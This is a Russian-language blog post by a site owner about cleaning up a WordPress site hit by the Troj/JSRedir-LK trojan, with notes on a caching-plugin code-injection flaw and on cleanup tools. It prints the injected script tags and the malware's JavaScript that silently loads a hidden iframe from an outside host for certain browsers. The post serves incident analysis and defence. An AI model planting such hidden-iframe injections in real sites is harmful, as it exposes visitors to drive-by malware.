Троян Troj/JSRedir-LK и уязвимость WordPress

в 8:33, , рубрики: wordpress, wordpress plugins, безопасность, информационная безопасность, метки: , ,

Буквально сегодня закончила разбираться с интересной и новой для себя задачкой — подопечный сайт оказался в блэклисте яндекса. Причина — троян Troj/JSRedir-LK (по данным компании Sophos).
Уточню: в блэклисте оказались сразу два сайта, один из которых является поддоменом второго, и ниже я опишу, какие трансформации произошли с обоими в результате действия трояна.

А произошло вот что:
в файле header.php (subdomain) появилось два скрипта,
<script type="text/javascript" src="http://ligaexpress.ru/wp-includes/google-analytics.php"></script> и
<script type="text/javascript" src="http://My-Main-Domain.ru/wp-includes/google-analytics.php"></script>,
в файле footer.php (subdomain) перед </html> — также скрипт со ссылкой на ligaexpress,
и в папке wp-includes родительского сайта (domain) — файл google-analytics.php, заканчивающийся следующим кодом:

function showBrowVer()
{
    var data = browserDetectNav();

    if (data[0]) {
      if ((data[0] == 'Opera' || data[0] == 'MSIE'|| (data[0] == 'Firefox' & data[1] <= 17)) & data[3] == 'Windows'){
          var js_kod2 = document.createElement('iframe');
              js_kod2.src = 'http://moradomedia.nl/new/php/one-style.php';
              js_kod2.width = '2px';                  
              js_kod2.height = '2px';                
              js_kod2.style = 'visibility: hidden;';  
              document.body.appendChild(js_kod2);
      }
    }
}

Что любопытно, ссылка js_kod2.src периодически менялась.

Еще любопытно, что кроме того самого Sophos'а ни один из использованных антивирусов ничего не нашел. Ни на сайте, ни на компьютере, который я после возни с сайтом решила проверить. Зато софосовская утилита Virus Removal Tool нашла тот самый Troj/JSRedir-LK, и вдобавок еще и Troj/JSRedir-JK, оба в Temporary Internet Files. За что я ее теперь всячески рекомендую [1].
А также порекомендую плагин для вордпресса Wordfence Security [2]. Меня он покорил возможностью просканировать файлы, включая файлы темы и плагинов, и сравнить их с хранящимися на WordPress.org. Даже жаль, что к моменту его установки и запуска сканирования все лишнее уже было удалено.

И еще о вордпресс (о той самой уязвимости, упомянутой в теме статьи).
Пока искала дыру, через которую проник вирус, нашла информацию о том, что в плагинах для кеширования (а именно WP Super Cache 1.2 и более ранние; W3 Total Cache 0.9.2.8 и более ранние) обнаружена уязвимость, позволяющая удаленному пользователю внедрить и выполнить произвольный PHP код. Подробнее об этом можно прочитать здесь [3] и здесь [4].
Так что держите ноги в тепле, а плагины — обновленными. А, да, и не храните ftp пароли в Total Commander.
Спасибо за внимание.

Ссылки на упомянутое в тексте:
1. Virus Removal Tool от Sophos (free)
2. Плагин Wordfence Security для WordPress
3. Обнаружена опасная уязвимость в кеширующих плагинах для WordPress, securitylab.ru
4. mfunc issue

Автор: Aireen

Источник

* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js